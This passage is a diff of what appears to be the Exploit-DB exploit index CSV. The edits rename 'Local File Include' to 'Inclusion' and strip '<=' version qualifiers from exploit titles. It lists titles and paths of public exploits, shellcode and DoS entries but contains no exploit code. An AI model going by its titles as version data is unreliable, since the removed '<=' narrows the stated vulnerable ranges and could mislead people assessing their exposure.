5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service",2011-01-03,"Rick Regan",php,dos,0 35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 - 'getURL.php' SQL Injection",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0 35166,platforms/windows/remote/35166.c,"Ace Video Workshop 1.2.0.0 - 'ir50_lcs.dll' DLL Loading Arbitrary Code Execution",2011-01-03,d3c0der,windows,remote,0 35167,platforms/php/webapps/35167.txt,"Joomla 1.0.x - 'ordering' Parameter Cross-Site Scripting",2011-01-06,"Aung Khant",php,webapps,0 @@ -31724,10 +31724,10 @@ id,file,description,date,author,platform,type,port 35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0 35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0 35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0 -35295,platforms/php/webapps/35295.txt,"Joomla Component - 'com_frontenduseraccess' Local File Include",2011-02-01,wishnusakti,php,webapps,0 +35295,platforms/php/webapps/35295.txt,"Joomla Component - 'com_frontenduseraccess' Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0 35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 -35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting and Local File Include Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 +35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting and Local File Inclusion Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - (picture.php rate param) SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0 @@ -31741,7 +31741,7 @@ id,file,description,date,author,platform,type,port 35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0 35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0 35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-01-15,NLSecurity,php,webapps,0 -35229,platforms/windows/remote/35229.html,"Microsoft Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (1)",2014-11-13,yuange,windows,remote,0 +35229,platforms/windows/remote/35229.html,"Microsoft Internet Explorer 11 - OLE Automation Array Remote Code Execution (1)",2014-11-13,yuange,windows,remote,0 35230,platforms/windows/remote/35230.rb,"Microsoft Internet Explorer < 11 - OLE Automation Array Remote Code Execution (Metasploit)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 - 'oid' Parameter SQL Injection",2011-01-16,ShivX,php,webapps,0 35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption",2011-01-18,"Dan Rosenberg",linux,remote,0 @@ -31806,13 +31806,13 @@ id,file,description,date,author,platform,type,port 35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Parameter Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps,0 35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 - 'cp_menu_data_file.php' SQL Injection",2011-01-31,"AutoSec Tools",php,webapps,0 35308,platforms/windows/remote/35308.html,"Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote,0 -35309,platforms/php/webapps/35309.txt,"Betsy 4.0 - 'page' Parameter Local File Include",2011-02-02,MizoZ,php,webapps,0 -35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 - Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0 +35309,platforms/php/webapps/35309.txt,"Betsy 4.0 - 'page' Parameter Local File Inclusion",2011-02-02,MizoZ,php,webapps,0 +35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums 9.5 - Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0 35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross-Site Scripting",2011-02-03,MustLive,php,webapps,0 35567,platforms/php/webapps/35567.txt,"Eleanor CMS Cross-Site Scripting and Multiple SQL Injection Vulnerabilities",2011-04-05,"High-Tech Bridge SA",php,webapps,0 -35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 - 'admin.php' Local File Include",2011-04-05,"High-Tech Bridge SA",php,webapps,0 -35314,platforms/linux/remote/35314.txt,"Wireshark <= 1.4.3 - (.pcap) Memory Corruption",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0 +35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 - 'admin.php' Local File Inclusion",2011-04-05,"High-Tech Bridge SA",php,webapps,0 +35314,platforms/linux/remote/35314.txt,"Wireshark 1.4.3 - (.pcap) Memory Corruption",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0 35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 - 'custid' Parameter SQL Injection",2011-02-07,NoNameMT,php,webapps,0 35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management Authentication Bypass",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0 35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0 @@ -31821,7 +31821,7 @@ id,file,description,date,author,platform,type,port 35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - CSRF",2014-11-26,"High-Tech Bridge SA",php,webapps,80 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0 -35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution",2014-11-22,"Taoguang Chen",php,webapps,0 +35323,platforms/php/webapps/35323.md,"MyBB 1.8.2 - unset_globals() Function Bypass and Remote Code Execution",2014-11-22,"Taoguang Chen",php,webapps,0 35324,platforms/php/webapps/35324.txt,"WordPress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - Win32k.sys Denial of Service",2014-11-22,Kedamsky,windows,dos,0 @@ -31842,7 +31842,7 @@ id,file,description,date,author,platform,type,port 35340,platforms/php/webapps/35340.txt,"WordPress wpDataTables Plugin 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",php,webapps,0 35341,platforms/php/webapps/35341.py,"WordPress wpDataTables Plugin 1.5.3 - Unauthenticated Shell Upload",2014-11-24,"Claudio Viviani",php,webapps,0 35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection",2014-11-24,"ZoRLu Bugrahan",aix,dos,0 -35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0 +35343,platforms/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0 35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot param) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,dos,0 35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Path Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 @@ -31860,20 +31860,20 @@ id,file,description,date,author,platform,type,port 35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35361,platforms/php/webapps/35361.txt,"Escort Directory CMS SQL Injection",2011-02-19,NoNameMT,php,webapps,0 -35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Include and Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 +35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion and Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 35363,platforms/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF",2014-11-25,LiquidWorm,windows,dos,0 35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime stconf.nsf/WebMessage messageString Parameter XSS",2011-02-21,"Dave Daly",multiple,remote,0 35365,platforms/php/webapps/35365.py,"phpMyRecipes 1.2.2 - (dosearch.php words_exact param) SQL Injection",2014-11-25,bard,php,webapps,80 35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime stconf.nsf XSS",2011-02-21,"Dave Daly",multiple,remote,0 35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Stored XSS",2014-11-25,"Halil Dalabasmaz",php,webapps,80 35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 Malformed Packet NULL Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 -35370,platforms/linux/local/35370.c,"Linux Kernel <= 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit",2014-11-25,"Kaiqu Chen",linux,local,0 +35370,platforms/linux/local/35370.c,"Linux Kernel 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit",2014-11-25,"Kaiqu Chen",linux,local,0 35371,platforms/php/webapps/35371.txt,"WordPress Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 - 'wpfn' Parameter Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps,0 35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 - 'stcenter.nsf' Cross-Site Scripting",2011-02-22,andrew,php,webapps,0 35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Parameter Cross-Site Scripting",2011-02-22,"Aung Khant",php,webapps,0 -35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Parameter Local File Include",2011-02-16,"AutoSec Tools",php,webapps,0 +35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Parameter Local File Inclusion",2011-02-16,"AutoSec Tools",php,webapps,0 35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0 35378,platforms/php/webapps/35378.txt,"WordPress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 @@ -31883,7 +31883,7 @@ id,file,description,date,author,platform,type,port 35385,platforms/php/webapps/35385.pl,"WordPress Plugin Slider Revolution 3.0.95 /Showbiz Pro 1.7.1 - Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80 35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Local Privilege Escalation",2011-02-24,"Dominik George",linux,remote,0 35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Parameter Cross-Site Scripting",2011-02-25,"Aung Khant",php,webapps,0 -35395,platforms/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement <= 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",windows,local,0 +35395,platforms/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",windows,local,0 35391,platforms/php/webapps/35391.txt,"glFusion 1.1.x/1.2.1 - 'users.php' SQL Injection",2011-02-25,H3X,php,webapps,0 35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 @@ -31902,10 +31902,10 @@ id,file,description,date,author,platform,type,port 35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Parameter Cross-Site Scripting",2011-03-03,"AutoSec Tools",php,webapps,0 35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 -35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Include",2011-03-04,"AutoSec Tools",windows,remote,0 +35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion",2011-03-04,"AutoSec Tools",windows,remote,0 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter XSS",2011-03-07,Dionach,asp,webapps,0 35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 Pages/login.aspx Language Parameter XSS",2011-03-07,Dionach,asp,webapps,0 -35413,platforms/php/dos/35413.php,"WordPress <= 4.0 - Denial of Service Exploit",2014-12-01,SECURELI.com,php,dos,80 +35413,platforms/php/dos/35413.php,"WordPress 4.0 - Denial of Service Exploit",2014-12-01,SECURELI.com,php,dos,80 35414,platforms/php/dos/35414.txt,"WordPress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 35415,platforms/php/dos/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 @@ -31915,7 +31915,7 @@ id,file,description,date,author,platform,type,port 35420,platforms/hardware/webapps/35420.txt,"IPUX Cube Type CS303C IP Camera - (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0 35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0 -35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <= 13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0 +35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS 13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0 35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0 36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0 @@ -31958,7 +31958,7 @@ id,file,description,date,author,platform,type,port 35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 URI Security Bypass",2011-03-14,"DcLabs Security Research Group",multiple,remote,0 35465,platforms/multiple/dos/35465.pl,"VLC Media Player 1.0.5 - (.ape) Denial of Service",2011-03-15,KedAns-Dz,multiple,dos,0 35466,platforms/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution",2011-03-05,"RedTeam Pentesting GmbH",linux,remote,0 -35467,platforms/php/webapps/35467.txt,"SugarCRM <= 6.1.1 Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0 +35467,platforms/php/webapps/35467.txt,"SugarCRM 6.1.1 Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0 35468,platforms/windows/remote/35468.pl,"Monkey's Audio - (.ape) Buffer Overflow",2011-03-16,KedAns-Dz,windows,remote,0 35469,platforms/php/webapps/35469.txt,"Wikiwig 5.01 - Cross-Site Scripting and HTML Injection Vulnerabilities",2011-03-10,"AutoSec Tools",php,webapps,0 35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS 'page_info.php' SQL Injection",2011-03-16,H3X,php,webapps,0 @@ -31992,7 +31992,7 @@ id,file,description,date,author,platform,type,port 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 - (.rmp) Remote Buffer Overflow",2011-03-27,KedAns-Dz,multiple,remote,0 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0 35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 -35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager <= 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection Vulnerabilities",2011-04-27,"Alberto Revelli",jsp,webapps,0 +35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection Vulnerabilities",2011-04-27,"Alberto Revelli",jsp,webapps,0 35673,platforms/php/webapps/35673.txt,"WordPress Daily Maui Photo Widget Plugin 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35674,platforms/php/webapps/35674.txt,"WordPress WP Photo Album Plugin 1.5.1 - 'id' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35675,platforms/php/webapps/35675.txt,"Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-27,"Emilio Pinna",php,webapps,0 @@ -32002,19 +32002,19 @@ id,file,description,date,author,platform,type,port 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0 35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - (.fp4f) Remote Buffer Overflow",2011-03-27,KedAns-Dz,windows,remote,0 -35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 -35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 +35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 +35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35558,platforms/php/webapps/35558.txt,"PHP-Fusion 'articles.php' Cross-Site Scripting",2011-04-02,KedAns-Dz,php,webapps,0 35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0 35513,platforms/linux/remote/35513.py,"Apache James Server 2.3.2 - Remote Command Execution",2014-12-10,"Jakub Palaczynski",linux,remote,4555 35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 - 'jobVacancy.php' Cross-Site Scripting",2011-03-27,"AutoSec Tools",php,webapps,0 35515,platforms/php/webapps/35515.txt,"Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0 -35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Parameter Local File Include",2011-03-28,eidelweiss,php,webapps,0 +35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Parameter Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 - 'search.php' Cross-Site Scripting",2011-03-28,"kurdish hackers team",php,webapps,0 35557,platforms/php/webapps/35557.txt,"PHP-Fusion 'article_id' Parameter SQL Injection",2011-04-04,KedAns-Dz,php,webapps,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 35520,platforms/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0 -35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Cross-Site Scripting and Multiple Local File Include Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 +35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Cross-Site Scripting and Multiple Local File Inclusion Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",php,webapps,0 35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 URI Cross-Site Scripting",2011-03-29,"Mesut Timur",php,webapps,0 35524,platforms/php/webapps/35524.txt,"XOOPS 'view_photos.php' Cross-Site Scripting",2011-03-29,KedAns-Dz,php,webapps,0 @@ -32027,7 +32027,7 @@ id,file,description,date,author,platform,type,port 35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,windows,dos,0 35533,platforms/php/webapps/35533.py,"WordPress Download Manager 2.7.4 - Remote Code Execution",2014-12-15,"Claudio Viviani",php,webapps,0 35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' Parameter HTML Injection",2011-03-31,"High-Tech Bridge SA",php,webapps,0 -35535,platforms/php/webapps/35535.php,"PHPads <= 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0 +35535,platforms/php/webapps/35535.php,"PHPads 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x / 4.1.x / 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0 35560,platforms/windows/remote/35560.txt,"RealNetworks GameHouse 'InstallerDlg.dll' 2.6.0.445 ActiveX Control - Multiple Vulnerabilities",2011-04-03,rgod,windows,remote,0 35561,platforms/php/webapps/35561.txt,"WPwizz AdWizz Plugin 1.0 - 'link' Parameter Cross-Site Scripting",2011-04-04,"John Leitch",php,webapps,0 @@ -32045,13 +32045,13 @@ id,file,description,date,author,platform,type,port 35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 - (.avi) Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0 35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass Weakness",2011-03-30,mmartinec,linux,remote,0 35555,platforms/php/webapps/35555.txt,"AWCM 2.x - 'search.php' Cross-Site Scripting",2011-04-01,"Antu Sanadi",php,webapps,0 -35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Include Vulnerabilities",2011-04-04,KedAns-Dz,php,webapps,0 +35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Inclusion Vulnerabilities",2011-04-04,KedAns-Dz,php,webapps,0 35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 - 'feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,multiple,remote,0 35571,platforms/php/webapps/35571.txt,"TextPattern 4.2 - 'index.php' Cross-Site Scripting",2011-04-06,"kurdish hackers team",php,webapps,0 35572,platforms/php/webapps/35572.txt,"Redmine 1.0.1/1.1.1 - 'projects/hg-hellowword/news/' Cross-Site Scripting",2011-04-06,"Mesut Timur",php,webapps,0 35573,platforms/windows/remote/35573.txt,"Microsoft Excel - Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",windows,remote,0 -35574,platforms/php/webapps/35574.txt,"vtiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Include",2011-04-08,"John Leitch",php,webapps,0 -35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Include",2011-04-08,KedAns-Dz,php,webapps,0 +35574,platforms/php/webapps/35574.txt,"vtiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion",2011-04-08,"John Leitch",php,webapps,0 +35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Inclusion",2011-04-08,KedAns-Dz,php,webapps,0 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting",2011-04-07,"kurdish hackers team",asp,webapps,0 35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - RCE (LFI) via SQL Injection Exploit",2014-12-19,Wireghoul,php,webapps,0 @@ -32082,7 +32082,7 @@ id,file,description,date,author,platform,type,port 35604,platforms/php/webapps/35604.txt,"eForum 1.1 - '/eforum.php' Arbitrary File Upload",2011-04-09,QSecure,php,webapps,0 35605,platforms/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0 -35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress - 'general.php' Local and Remote File Include Vulnerabilities",2011-04-12,"Dr Trojan",php,webapps,0 +35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress - 'general.php' Local and Remote File Inclusion Vulnerabilities",2011-04-12,"Dr Trojan",php,webapps,0 35608,platforms/php/webapps/35608.txt,"The Gazette Edition 2.9.4 For WordPress - Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Parameter Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps,0 @@ -32094,23 +32094,23 @@ id,file,description,date,author,platform,type,port 35616,platforms/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps,0 35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System 'Keyword' Parameter Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0 35618,platforms/php/webapps/35618.txt,"RunCMS 'partners' Module 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 -35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Include and SQL Injection Vulnerabilities",2011-04-15,KedAns-Dz,php,webapps,0 +35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion and SQL Injection 